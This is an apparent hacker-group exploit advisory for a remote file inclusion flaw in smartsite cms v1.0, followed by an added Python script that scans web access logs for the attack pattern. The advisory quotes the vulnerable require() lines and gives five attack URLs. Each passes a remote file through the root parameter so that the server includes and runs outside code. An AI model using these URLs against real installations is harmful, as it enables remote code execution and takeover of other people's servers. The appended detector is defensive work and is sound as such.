smartsite cms v1.0 Remote File include



smartsite cms v1.0 Remote File include
-------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
Arabian Security Team
-------------------------------------------------
site of script:www.smartsitecms.net
-------------------------------------------------
Vulnerable: smartsite cms v1.0
-------------------------------------------------
vulnerable code:
----------------------
1-in comment.php :
require($root . "include/inc_foot.php");
---------------------------------------
2-in /admin/comedit.php :
else
	{
		require('../include/inc_accessfail.php');
	}
	?>

www.example.com/(path)/comment.php?root=http://evilcode.txt?
www.example.com/(path)/admin/test.php?root=http://evilcode.txt?
www.example.com/(path)/admin/index.php?root=http://evilcode.txt??root=http://evilcode.txt?
www.example.com/(path)/admin/include/inc_adminfoot.php?root=http://evilcode.txt?
www.example.com/(path)/admin/comedit.php?root=http://evilcode.txt?
--------------------------------------------------
Discovered By CrAsh_oVeR_rIdE
E-mail:KARKOR23@hotmail.com
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3 AND ALL LEZR.COM Member
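
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web access logs for requests whose `root` parameter carries a URL instead of a local path prefix. The log lines, addresses, host names and the `other.php` script are constructed; only the parameter name and the listed script paths come from the advisory.

```python
import re
from urllib.parse import parse_qsl

# Script paths the advisory lists as taking a "root" parameter.
LISTED_SCRIPTS = (
    "/comment.php", "/admin/test.php", "/admin/index.php",
    "/admin/include/inc_adminfoot.php", "/admin/comedit.php",
)
# Client address and request target from a common/combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value starting with scheme:// is a URL, not a local directory prefix.
URL_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Constructed sample log (documentation addresses and hosts), not real traffic.
SAMPLE_LOG = '''\
203.0.113.5 - - [10/Jul/2006:12:00:01 +0000] "GET /cms/comment.php?id=4 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Jul/2006:12:00:07 +0000] "GET /cms/comment.php?root=http://files.example.net/x.txt? HTTP/1.1" 200 812
203.0.113.9 - - [10/Jul/2006:12:00:09 +0000] "GET /cms/admin/comedit.php?root=hTTp%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 790
198.51.100.2 - - [10/Jul/2006:12:01:30 +0000] "GET /cms/comment.php?id=4&ref=http://www.example.org/ HTTP/1.1" 200 5120
198.51.100.7 - - [10/Jul/2006:12:02:00 +0000] "GET /cms/other.php?root=ftp://files.example.net/x.txt HTTP/1.1" 404 210
'''


def find_root_includes(log_text):
    """Return (client, path, root_value, listed) per request whose root is a URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes, so root=http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == "root" and URL_SCHEME.match(value):
                hits.append((client, path, value, path.endswith(LISTED_SCRIPTS)))
    return hits


if __name__ == "__main__":
    for client, path, value, listed in find_root_includes(SAMPLE_LOG):
        tag = "listed in advisory" if listed else "other script"
        print(f"{client} {path} root={value!r} ({tag})")
```

Access logs normally record only the query string, so a `root` value sent in a POST body or cookie would not appear in this scan.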
